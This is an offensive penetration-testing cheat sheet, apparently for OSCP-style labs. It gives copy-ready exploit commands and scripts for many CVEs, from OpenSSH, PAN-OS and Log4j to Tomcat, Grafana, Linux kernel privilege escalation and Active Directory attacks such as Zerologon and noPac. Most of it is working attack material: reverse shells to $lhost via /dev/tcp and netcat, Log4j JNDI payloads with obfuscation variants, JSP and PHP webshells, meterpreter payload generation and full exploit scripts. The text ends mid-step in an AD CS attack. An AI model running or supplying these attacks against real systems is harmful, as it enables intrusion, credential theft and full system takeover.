- 2024-2025 Critical CVEs
- Bash
- MySQL
- PostgreSQL
- Redis
- SSH
- SMB
- FTP
- Exim
- Nexus
- Log4j
- Tomcat
- Drupal
- PHPMailer
- Webmin
- Jenkins
- Supervisord
- SaltStack
- Ruby (Net::FTP)
- ImageMagick
- Grafana
- Apache
- Apache Commons Text
- Aerospike
- Linux Kernel
- FreeSWITCH
- WiFi Mouse
- Mobile Mouse
- Usermin
- Vesta Control Panel
- JDWP
- Windows/Active Directory
- Microsoft Exchange
- Spring Framework
- Microsoft Office
High-Priority vulnerabilities from 2024-2025 actively exploited in the wild
OpenSSH RCE via race condition in signal handler - Affected: OpenSSH 8.5p1 - 9.7p1 (glibc-based Linux)
# Check version
ssh -V
nmap -sV -p 22 $rhost | grep OpenSSH
# Vulnerable versions: 8.5p1 <= OpenSSH < 9.8p1 (except 9.7p1 patched)
# Not exploitable on OpenBSD, only glibc-based Linux
# Detection (banner check)
nc -vn $rhost 22 | head -1
# Note: Exploitation requires many connection attempts (hours to days)
# Mitigation: Update to OpenSSH 9.8p1+ or set LoginGraceTime to 0Command Injection in GlobalProtect - Affected: PAN-OS 10.2, 11.0, 11.1
# Detection - Check for GlobalProtect
curl -sk "https://$rhost/global-protect/portal/css/login.css"
# Exploitation (Command Injection via Cookie)
curl -sk "https://$rhost/ssl-vpn/hipreport.esp" \
-H "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/test\`id\`"
# Read command output
curl -sk "https://$rhost/ssl-vpn/hipreport.esp" \
-H "Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/test"
# Metasploit
msfconsole -q -x "use exploit/linux/http/panos_telemetry_cmd_exec; set RHOSTS $rhost; exploit"Out-of-bounds write in sslvpnd - Affected: FortiOS 6.0-7.4.2
# Detection - Check SSL VPN endpoint
curl -sk "https://$rhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
# Note: Exploitation is complex, requires heap manipulation
# POC: https://github.com/BishopFox/cve-2024-21762-check
# Check vulnerability
python3 cve-2024-21762-check.py -t $rhostAuthentication bypass to RCE - Affected: TeamCity < 2023.11.4
# Detection
curl -sk "https://$rhost:8111/app/rest/debug/processes"
# Create admin user (Auth Bypass)
curl -sk "https://$rhost:8111/app/rest/users" \
-X POST -H "Content-Type: application/json" \
-d '{"username": "hacker", "password": "hacker", "email": "hacker@evil.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}'
# Metasploit
msfconsole -q -x "use exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198; set RHOSTS $rhost; exploit"Path traversal to auth bypass - Affected: ScreenConnect < 23.9.8
# Detection
curl -sk "https://$rhost/SetupWizard.aspx" | grep -i "screenconnect"
# Exploitation - Setup wizard access bypass
curl -sk "https://$rhost/SetupWizard.aspx/../../SetupWizard.aspx"
# Create admin account via setup wizard (if accessible)
# Then upload malicious extension for RCE
# Metasploit
msfconsole -q -x "use exploit/windows/http/connectwise_screenconnect_auth_bypass; set RHOSTS $rhost; exploit"CUPS IPP attribute injection leads to RCE - Affected: cups-browsed < 2.0.1
# Detection - Check if CUPS is exposed
nmap -sU -p 631 $rhost
lpstat -h $rhost -l
# Check cups-browsed status
systemctl status cups-browsed
# Exploitation requires:
# 1. cups-browsed listening on UDP 631
# 2. Attacker-controlled printer advertisement
# 3. User prints to malicious printer
# POC: https://github.com/OpenPrinting/cups-browsed/security/advisoriesServer-Side Template Injection - Affected: Confluence 8.0.x - 8.5.3
# Detection
curl -sk "https://$rhost/template/aui/text-inline.vm" | grep -i confluence
# SSTI exploitation
curl -sk "https://$rhost/template/aui/text-inline.vm" \
-X POST -H "Content-Type: application/x-www-form-urlencoded" \
-d "label=\u0027%2b#request[\u0027.KEY_velocity.struts2.context\u0027].internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027X-Cmd-Response\u0027,@java.lang.Runtime@getRuntime().exec(\u0027id\u0027))"
# Metasploit
msfconsole -q -x "use exploit/multi/http/atlassian_confluence_rce_cve_2023_22527; set RHOSTS $rhost; exploit"# Quick CVE detection with nmap
nmap -Pn -sV --script "vuln,exploit" $rhost 2>/dev/null | grep -E "CVE-|VULNERABLE"Bash RCE via CGI scripts - Affected: Bash < 4.3
# Scan port + banner
nmap -sV -p 80,443,8080 $rhost
# Check for CGI with Nikto
nikto -h http://$rhost:$rport# Test vulnerability via User-Agent
curl -H "User-Agent: () { :;}; echo; echo vulnerable" \
"http://$rhost:$rport/cgi-bin/stats"
# RCE: Read /etc/passwd
curl -H "User-Agent: () { :;}; /bin/bash -c 'cat /etc/passwd'" \
"http://$rhost:$rport/cgi-bin/stats"
# List files
curl -H "User-Agent: () { :;}; /bin/ls -la /var/www/html/" \
"http://$rhost:$rport/cgi-bin/stats"
# Reverse shell
curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'" \
"http://$rhost:$rport/cgi-bin/stats"MySQL/MariaDB Authentication Bypass - Race Condition
#!/usr/bin/env python3
import subprocess
TARGET = "TARGET_IP" # Replace with target
PORT = "3306"
USER = "root"
DB = "mysql"
WRONG_PASS = "wrongpassword"
QUERY = "SELECT LOAD_FILE('/etc/passwd')"
print(f"[*] Trying to bypass login on {TARGET}:{PORT} (max 300 attempts)...")
for i in range(1, 301):
cmd = [
"mysql",
f"--host={TARGET}",
f"--port={PORT}",
f"-u{USER}",
f"--password={WRONG_PASS}",
"--skip-ssl",
DB,
"-e", QUERY
]
result = subprocess.run(cmd, capture_output=True, text=True)
if "Access denied" not in result.stderr:
print(f"[+] SUCCESS on attempt {i}!")
print(result.stdout.strip())
break
elif i % 50 == 0:
print(f" → {i} attempts... still trying")PostgreSQL COPY FROM PROGRAM RCE - Requires DB access
# Connect to PostgreSQL
psql -U postgres -h $rhost
# Create table for command output
CREATE TABLE cmd_exec(cmd_output text);
# Execute command
COPY cmd_exec FROM PROGRAM 'id';
# View output
SELECT * FROM cmd_exec;
# Read sensitive files
COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';
SELECT * FROM cmd_exec;
# Reverse shell
COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/$lhost/$lport 0>&1"';Redis Lua Sandbox Escape - Affected: Ubuntu/Debian packages
# Check version + OS
redis-cli -h $rhost -p 6379 info server | grep -E "redis_version|os"
# Check Lua module
redis-cli -h $rhost -p 6379 EVAL "return require('bit')" 0# RCE via Lua
redis-cli -h $rhost -p 6379 EVAL '
local bit = require("bit")
return os.execute("whoami")
' 0
# Read file
redis-cli -h $rhost -p 6379 EVAL '
local bit = require("bit")
return os.execute("cat /etc/passwd")
' 0git clone https://github.com/aodsec/CVE-2022-0543.git
cd CVE-2022-0543
python3 -m venv venv && source venv/bin/activate
pip install redis bitstring
python3 CVE-2022-0543.py
# → Enter IP, Port, cmdLibSSH Authentication Bypass - Affected: < 0.7.6, < 0.8.4
# Clone exploit
git clone https://github.com/SilasSpringer/CVE-2018-10933.git
# Run exploit
python exploit.py $rhostOpenSSH Username Enumeration - Affected: < 7.7
# Download exploit
wget "https://raw.githubusercontent.com/Rhynorater/CVE-2018-15473-Exploit/master/sshUsernameEnumExploit.py"
# Install dependency
pip install paramiko==2.4.0
# Enumerate usernames
python sshUsernameEnumExploit.py --userList /usr/share/wordlists/rockyou.txt $rhost
# Bruteforce found users
hydra -l $user -P /usr/share/wordlists/rockyou.txt ssh://$rhost -s 22 -vVSamba RCE via Writable Share - Affected: 3.5.0 - 4.6.4
# Metasploit
msfconsole -q -x "use exploit/linux/samba/is_known_pipename; set RHOSTS $rhost; set RPORT 445; exploit"ProFTPD mod_copy Remote Command Execution - Affected: ProFTPD 1.3.5
# Connect to FTP
nc $rhost 21
# Copy command line to create PHP shell
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/backdoor.php
# Alternative: Create webshell directly
# Step 1: Connect and copy /etc/passwd to test
site cpfr /etc/passwd
site cpto /var/www/html/test.txt
# Step 2: Copy PHP webshell to web root
site cpfr /proc/self/cmdline
site cpto /var/www/html/backdoor.php
# Metasploit alternative
msfconsole -q -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS $rhost; set SITEPATH /var/www/html; exploit"Exim Mail Server Local Privilege Escalation - Affected: 4.87 - 4.91
# Download exploit
wget https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/linux/local/46996.sh -O raptor_exim_wiz
# Make executable
chmod +x raptor_exim_wiz
# Method 1: Setuid (creates SUID binary)
./raptor_exim_wiz -m setuid
# Creates /tmp/pwned with root SUID
/tmp/pwned
# Method 2: Netcat (opens shell on port 31337)
./raptor_exim_wiz -m netcat
nc 127.0.0.1 31337Nexus Repository Manager 2.x RCE - Authenticated
# Clone exploit
git clone https://github.com/jaychoubaby/CVE-2019-5475-Nexus-Repository-Manager-
# Usage (requires valid credentials)
python3 exploit.py -u admin -p admin123 -t http://$rhost:8081 -c "id"Apache Log4j JNDI Injection RCE - Affected: 2.0-beta9 - 2.14.1
# Test for vulnerability
curl -H "X-Api-Version: \${jndi:ldap://$lhost:1389/a}" http://$rhost
# Common injection points
User-Agent: ${jndi:ldap://$lhost/a}
X-Forwarded-For: ${jndi:ldap://$lhost/a}
Cookie: ${jndi:ldap://$lhost/a}
Referer: ${jndi:ldap://$lhost/a}# Clone JNDI-Injection-Exploit
git clone https://github.com/welk1n/JNDI-Injection-Exploit
cd JNDI-Injection-Exploit
mvn clean package -DskipTests
# Start malicious LDAP/RMI server
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A $lhost
# Trigger with payload
curl -H "X-Api-Version: \${jndi:ldap://$lhost:1389/Basic/Command/Base64/...}" http://$rhost# Case variation
${jNdI:ldap://$lhost/a}
${${lower:j}ndi:ldap://$lhost/a}
${${upper:j}ndi:ldap://$lhost/a}
# Nested lookup
${${::-j}${::-n}${::-d}${::-i}:ldap://$lhost/a}
# Environment variable
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//$lhost/a}Tomcat PUT Method JSP Upload - Affected: 7.0.0 - 7.0.79
# Check version
curl -I http://$rhost:8080/
# Check PUT method
echo "test" > test.txt
curl -v -X PUT --data-binary @test.txt "http://$rhost:8080/test.txt"# Create JSP webshell
cat > shell.jsp << 'EOF'
<%@ page import="java.util.*,java.io.*"%>
<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
DataInputStream dis = new DataInputStream(p.getInputStream());
String disr = dis.readLine();
while ( disr != null ) { out.println(disr); disr = dis.readLine(); } %>
EOF
# Upload with PUT bypass (use / or ;)
curl -X PUT --data-binary @shell.jsp "http://$rhost:8080/shell.jsp/"
# Test RCE
curl "http://$rhost:8080/shell.jsp?cmd=whoami"
curl "http://$rhost:8080/shell.jsp?cmd=cat%20/etc/passwd"Tomcat AJP LFI - Affected: < 9.0.31, < 8.5.51, < 7.0.100
# Clone exploit
git clone https://github.com/hypn0s/AJPy
# Read WEB-INF/web.xml (credentials)
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml $rhost
# Default credentials often found
# tomcat:s3cretDrupal RCE via Form API - Affected: 7.x, 8.x
# Metasploit
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS $rhost; set RPORT 80; exploit"
# Manual (using ruby script)
# https://github.com/dreadlocked/Drupalgeddon2
ruby drupalgeddon2.rb http://$rhost/# Enumerate WordPress
wpscan --url http://$rhost --enumerate ap,at,u
# Aggressive plugin detection
wpscan --url http://$rhost --enumerate p --plugins-detection aggressiveWordPress Mail Masta Plugin Local File Inclusion - Commonly seen in OSCP
# Check if plugin exists
curl -s "http://$rhost/wp-content/plugins/mail-masta/" | grep -i "index"
# LFI via count_of_send.php
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
# LFI via csvexport.php
curl "http://$rhost/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
# Windows - read win.ini
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=c:/windows/win.ini"# Base64 encode source code
curl "http://$rhost/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/wp-config.php"
# Decode
echo "BASE64_OUTPUT" | base64 -d# Check version
curl -s "http://$rhost/wp-content/plugins/wp-file-manager/readme.txt" | grep -i "stable tag"
# Upload webshell
curl -k "http://$rhost/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" -F "upload[]=@shell.php" -F "cmd=upload" -F "target=l1_Lw"
# Access shell
curl "http://$rhost/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id"# Host payload file on attacker machine with content:
# <pre>system($_GET['cmd'])</pre>
# Trigger RCE
curl "http://$rhost/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://$lhost/payload.txt"
# Execute command
curl "http://$rhost/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://$lhost/payload.txt&cmd=id"GlassFish 4.1 Directory Traversal - Read arbitrary files
nmap -sV -p 4848,8080 $rhost
curl -s "http://$rhost:4848/" | grep -i "glassfish"# Read win.ini (Windows)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"
# Read /etc/passwd (Linux)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd"
# Read SynaMan config (example from OSCP)
curl "http://$rhost:4848/theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afsynaman/config/AppConfig.xml"# If admin console is accessible (default: no password)
# Generate WAR payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war -o shell.war
# Deploy via admin console: http://$rhost:4848/
# Applications > Deploy > Upload WAR file
# Trigger shell
curl "http://$rhost:8080/shell/"PHPMailer Command Injection - Affected: < 5.2.18
# Send malicious POST request
curl -X POST http://$rhost/ \
-d 'action=submit' \
-d 'name=<?php system($_GET["cmd"]); ?>' \
-d 'email="attacker\" -oQ/tmp/ -X/var/www/html/shell.php some"@evil.com' \
-d 'message=test'
# Test RCE
curl "http://$rhost/shell.php?cmd=whoami"
curl "http://$rhost/shell.php?cmd=cat%20/etc/passwd"Webmin Backdoor RCE - Affected: 1.890 - 1.920
# Metasploit
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS $rhost; set RPORT 10000; set SSL true; set PAYLOAD cmd/unix/bind_perl; exploit"
# Or use exploit/unix/webapp/webmin_backdoorJenkins CLI Arbitrary File Read - Affected: < 2.442, < LTS 2.426.3
# Install Java 11
apt install openjdk-11-jre
# Download Jenkins CLI
wget "http://$rhost:8080/jnlpJars/jenkins-cli.jar"
# Read files (various commands)
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http help "@/etc/passwd"
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http who-am-i "@/etc/passwd"
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http version "@/proc/self/environ"
# With authentication
java -jar jenkins-cli.jar -s http://$rhost:8080/ -http -auth "admin:password" connect-node "@/etc/passwd"Supervisord XML-RPC RCE - Affected: < 3.3.3
# Check if vulnerable
nmap -sV -p 9001 $rhost#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1] # http://target:9001/RPC2
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')(
'{} | tee -a {}'.format(command, logfile)
)
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])# Usage
python3 exploit.py "http://$rhost:9001/RPC2" "id"
python3 exploit.py "http://$rhost:9001/RPC2" "cat /etc/passwd"SaltStack Authentication Bypass + RCE - Affected: < 3000.2
# Clone exploit
git clone https://github.com/dozernz/cve-2020-11651
# Execute command
python CVE-2020-11651.py $rhost master "id"
# Bind shell
python CVE-2020-11651.py $rhost master "nc -lvp 4444 -e /bin/bash"
# Connect
nc $rhost 4444Ruby Net::FTP Command Injection - Affected: < 2.4.3, < 2.3.6
# Create venv and run FTP server
python3 -m venv ftpvenv
source ftpvenv/bin/activate
pip install pyftpdlib
echo "test" > dummy.txt
python3 -m pyftpdlib -p 2121 -i 0.0.0.0# Base64 encode reverse shell
echo -n 'nc -e /bin/bash $lhost 4444' | base64
# Payload (via Burp)
# GET /download?uri=ftp://$lhost:2121/dummy.txt&file=|bash${IFS}-c${IFS}'{echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}'ImageMagick Command Injection via Filename
POST /upload.php HTTP/1.1
Host: $rhost
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="Upload"; filename="|en\"`echo BASE64_REVSHELL | base64 -d | bash`\".png"
Content-Type: image/jpeg
dummy
------Boundary--# Generate payload
echo -n 'bash -i >& /dev/tcp/$lhost/$lport 0>&1' | base64
# Use output in filename| CVE | Service | Type | Port |
|---|---|---|---|
| CVE-2014-6271 | Bash/CGI | RCE | 80/443 |
| CVE-2012-2122 | MySQL | Auth Bypass | 3306 |
| CVE-2019-9193 | PostgreSQL | RCE | 5432 |
| CVE-2022-0543 | Redis | RCE | 6379 |
| CVE-2018-10933 | LibSSH | Auth Bypass | 22 |
| CVE-2017-7494 | Samba | RCE | 445 |
| CVE-2017-12615 | Tomcat | RCE | 8080 |
| CVE-2020-1938 | Tomcat AJP | LFI | 8009 |
| CVE-2018-7600 | Drupal | RCE | 80 |
| CVE-2016-10033 | PHPMailer | RCE | 80 |
| CVE-2019-15107 | Webmin | RCE | 10000 |
| CVE-2024-23897 | Jenkins | File Read | 8080 |
| CVE-2017-11610 | Supervisord | RCE | 9001 |
| CVE-2020-11651 | SaltStack | RCE | 4506 |
| CVE-2021-43798 | Grafana | Directory Traversal | 3000 |
| CVE-2021-41773 | Apache | Path Traversal | 80/443 |
| CVE-2022-0847 | Linux Kernel | Privilege Escalation | - |
| CVE-2020-13151 | Aerospike | RCE | 3000 |
| CVE-2022-42889 | Apache Commons Text | RCE | 80/8080 |
| EDB-47799 | FreeSWITCH | RCE | 8021 |
| EDB-50972 | WiFi Mouse | RCE | 1978 |
| EDB-50234 | Usermin | RCE | 20000 |
| - | Mobile Mouse | RCE | 9099 |
| - | Vesta Control Panel | RCE | 8083 |
| EDB-41154 | GNU Screen 4.5.0 | Priv Esc | - |
| - | JDWP | RCE | 5000/8000 |
Grafana Directory Traversal - Affected: 8.0.0-beta1 to 8.3.0
# Check version
curl -s http://$rhost:3000/login | grep -oP 'Grafana v[\d.]+'# Read /etc/passwd
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# Read Grafana config (contains database credentials)
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini"
# Read Grafana database
curl --path-as-is "http://$rhost:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db
# Extract credentials from database
sqlite3 grafana.db "SELECT login,password,salt FROM user;"# Try different plugins if alertlist doesn't work
for plugin in alertlist annolist barchart bargauge candlestick canvas cloudwatch dashlist debug elasticsearch gauge geomap gettingstarted grafana graph graphite heatmap histogram influxdb jaeger logs loki mixed mssql mysql news nodeGraph opentsdb piechart pluginlist postgres prometheus stackdriver stat state-timeline status-history table tempo testdata text timeseries traces trend xychart zipkin; do
curl -s --path-as-is "http://$rhost:3000/public/plugins/$plugin/../../../../../../../../etc/passwd" && echo "Plugin: $plugin works!" && break
doneApache Path Traversal RCE - Affected: 2.4.49, 2.4.50
# Check version
curl -I http://$rhost/
# Verify vulnerability
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"# Read files
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
curl -s --path-as-is "http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
# RCE (if mod_cgi is enabled)
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
# Reverse shell
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/$lhost/$lport 0>&1" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"curl -s --path-as-is -d "echo Content-Type: text/plain; echo;" \
"http://$rhost/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/home/$user/.ssh/id_rsa"Apache Commons Text RCE - Affected: < 1.10.0
# Check if target uses Apache Commons Text
# Usually found in Java applications
curl -s "http://$rhost:8080/Changelog" | grep -i "commons"#!/usr/bin/env python3
# Text4Shell RCE Exploit
import urllib.parse
import http.client
import sys
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& "
f"/dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/search?query={encoded_payload}" # Modify parameter for target
print(f"[+] Target: http://{target_ip}:8080{path}")
conn = http.client.HTTPConnection(target_ip, 8080)
conn.request("GET", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
conn.close()# Usage
nc -lvnp 4444
python3 text4shell.py $rhost $lhost 4444Aerospike Database RCE - Affected: < 5.1.0.3
# Check for Aerospike service
curl -s "http://$rhost/api/heartbeat" | grep -i aerospike# Clone exploit
git clone https://github.com/b4ny4n/CVE-2020-13151.git
cd CVE-2020-13151
# Install requirements
pip install aerospike --break-system-packages
# Start listener
nc -lvnp 80
# Execute exploit
python cve2020-13151.py --ahost $rhost --pythonshell --lhost=$lhost --lport=80Linux Kernel Arbitrary File Overwrite - Affected: 5.8 <= kernel < 5.16.11
uname -r
# Vulnerable if: 5.8 <= version < 5.16.11# Clone exploit
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git
cd CVE-2022-0847-DirtyPipe-Exploits
# Compile (on attacker or target)
gcc -static -o exploit-2 exploit-2.c
# Transfer to target
python -m http.server 80
wget http://$lhost/exploit-2
chmod +x exploit-2
# Find SUID binary
find / -perm -4000 2>/dev/null
# Exploit SUID binary
./exploit-2 /usr/bin/passwd # or another SUID binary
# Get root shell
whoamiLinux Kernel Race Condition - Affected: 2.6.22 <= kernel < 4.8.3
uname -r
# Vulnerable if: 2.6.22 <= version < 4.8.3# Method 1: SUID binary modification
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread dirtyc0w.c -o dirtyc0w -lcrypt
./dirtyc0w /etc/passwd "root::0:0:root:/root:/bin/bash"
su root
# Method 2: Cowroot (spawn root shell)
wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c
gcc -pthread cowroot.c -o cowroot -lcrypt
./cowroot
# Method 3: Firefart (creates new root user)
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
# Creates user "firefart" with root privileges
su firefartGNU Screen 4.5.0 Local Privilege Escalation
# Clone XenSpawn
git clone https://github.com/X0RW3LL/XenSpawn.git
cd XenSpawn/
chmod +x spawn.sh
sudo ./spawn.sh test
# Enter container
sudo systemd-nspawn -M test
# Clone exploit in container
git clone https://github.com/YasserREED/screen-v4.5.0-priv-escalate.git
cd screen-v4.5.0-priv-escalate
chmod +x exploit.sh
bash exploit.sh
# Copy compiled files
cp libhax.so /root
cp rootshell /root
exit
# Copy from container to host
sudo cp /var/lib/machines/test/root/libhax.so .
sudo cp /var/lib/machines/test/root/rootshell .# On target
cd /tmp
wget http://$lhost/libhax.so
wget http://$lhost/rootshell
wget http://$lhost/41154.sh
chmod +x 41154.sh
sed -i 's/\r$//' 41154.sh # Fix line endings
bash 41154.sh
whoami # Should be rootFreeSWITCH Event Socket Command Execution - Port 8021
#!/usr/bin/env python3
# FreeSWITCH 1.10.1 - Command Execution
import socket
import sys
host = sys.argv[1]
command = sys.argv[2]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 8021))
s.recv(1024)
s.send(b"auth ClueCon\n\n") # Default password
s.recv(1024)
s.send(f"api system {command}\n\n".encode())
response = s.recv(8096)
print(response.decode())
s.close()# Usage - Reverse shell
nc -lvnp 80
python3 47799.py $rhost 'powershell -e <BASE64_PAYLOAD>'WiFi Mouse 1.7.8.5 Remote Code Execution - Port 1978
# Download exploit
searchsploit -m 50972
sed -i 's/\xE2\x80\x8B//g' 50972.py # Fix unicode issues
# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$lhost LPORT=443 -f exe -o met.exe
# Start handler
msfconsole -q -x 'use multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST $lhost; set LPORT 443; run'
# Host payload
python -m http.server 80
# Execute exploit
python 50972.py $rhost $lhost met.exeMobile Mouse 3.6.0.4 Remote Code Execution - Port 9099
# Clone exploit
git clone https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit.git
cd Mobile-Mouse-3.6.0.4-Exploit
# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$lhost LPORT=443 -f exe -o met.exe
# Start handler
msfconsole -q -x 'use multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST $lhost; set LPORT 443; run'
# Host payload
python -m http.server 8080
# Upload and execute
python 1-MMUpload.py --target $rhost --lhost $lhost --file met.exe
python 2-MMExecute.py --target $rhost --file met.exeUsermin 1.820 RCE (Authenticated) - Port 20000
#!/usr/bin/env python3
# Usermin 1.820 - RCE via GnuPG
import requests
import urllib.parse
import re
import sys
target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
listen_ip = sys.argv[4]
listen_port = sys.argv[5]
target_url = f"https://{target}:20000"
session = requests.Session()
# Login
headers = {'Cookie': 'redirect=1; testing=1;', 'Referer': target_url}
session.post(f"{target_url}/session_login.cgi", headers=headers, verify=False,
data={"user": username, "pass": password})
# Exploit via GnuPG
payload = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {listen_ip} {listen_port} >/tmp/f;"
post_data = {
"name": f'";{payload}echo "',
"email": "exploit@test.com"
}
session.headers.update({'referer': target_url})
session.post(f"{target_url}/gnupg/secret.cgi", verify=False, data=post_data)
# Trigger exploit
key_list = session.post(f"{target_url}/gnupg/list_keys.cgi", verify=False)
last_key = re.findall(r"edit_key.cgi\?(.*?)'", str(key_list.content))[-2]
session.post(f"{target_url}/gnupg/edit_key.cgi?{last_key}", verify=False, timeout=3)# Usage
nc -lvnp 4444
python3 usermin_exploit.py $rhost $username $password $lhost 4444Vesta Control Panel RCE (Authenticated) - Port 8083
# Clone exploit
git clone https://github.com/CSpanias/vesta-rce-exploit.git
cd vesta-rce-exploit
# Execute
python3 vesta-rce-exploit.py https://$rhost:8083 $username $passwordJava Debug Wire Protocol RCE - Usually on Port 5000/8000
# Use pspy to detect JDWP
./pspy64
# Look for: java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8000# Clone JDWP Shellifier
git clone https://github.com/IOActive/jdwp-shellifier
cd jdwp-shellifier
# If JDWP is on localhost, forward the port
ssh -N -R 127.0.0.1:9000:127.0.0.1:8000 kali@$lhost
# Execute command (use forwarded port 9000)
python2 jdwp-shellifier.py -t 127.0.0.1 -p 9000 --cmd "chmod u+s /bin/bash"
# Trigger (connect to another port if needed)
nc 127.0.0.1 5000
# Get root
/bin/bash -pNetlogon Elevation of Privilege - Reset DC machine account password without authentication
# Scan for vulnerability
nxc smb $rhost -u '' -p '' -M zerologon# Clone and exploit
git clone https://github.com/dirkjanm/CVE-2020-1472 && cd CVE-2020-1472 && python3 cve-2020-1472-exploit.py DC01 $rhost
# Dump hashes with empty password
impacket-secretsdump -no-pass -just-dc $domain/'DC01$'@$rhost
# Restore DC password (IMPORTANT!)
python3 restorepassword.py $domain/DC01@DC01 -target-ip $rhost -hexpass <HEX_HASH>sAMAccountName Spoofing - Impersonate DC and perform DCSync
# Scan for vulnerability
nxc smb $rhost -u '$user' -p '$pass' -M nopac
# Clone and exploit (auto shell)
git clone https://github.com/Ridter/noPac && cd noPac && python3 noPac.py $domain/$user:$pass -dc-ip $rhost -shell
# Just get TGT impersonating DA
python3 noPac.py $domain/$user:$pass -dc-ip $rhost --impersonate administrator -dumpAD CS Machine Account Privilege Escalation via dNSHostName spoofing
# Add new machine account
impacket-addcomputer $domain/$user:$pass -computer-name 'EVILPC$' -computer-pass 'Password123!'
# Change dNSHostName to DC
python3 bloodyAD.py -d $domain -u $user -p $pass --host $rhost set object 'EVILPC$' dNSHostName -v 'DC01.$domain'
# Request certificate as DC
